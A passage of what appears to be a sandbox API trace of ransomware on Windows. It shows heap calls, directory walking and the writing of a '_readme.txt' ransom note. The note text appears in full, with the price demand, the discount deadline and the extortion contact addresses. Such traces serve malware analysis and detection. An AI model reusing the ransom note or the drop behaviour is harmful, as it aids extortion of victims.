lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.952] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0174.952] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.952] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.952] PathFindFileNameW (pszPath="") returned="" [0174.952] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.953] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.953] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.953] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.953] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0174.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.954] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0174.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.955] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.955] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.955] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.956] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*" (normalized: "c:\\boot\\nl-nl\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.957] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.957] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.957] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.957] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.958] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.962] RtlAllocateHeap (HeapHandle=0x6a0000, 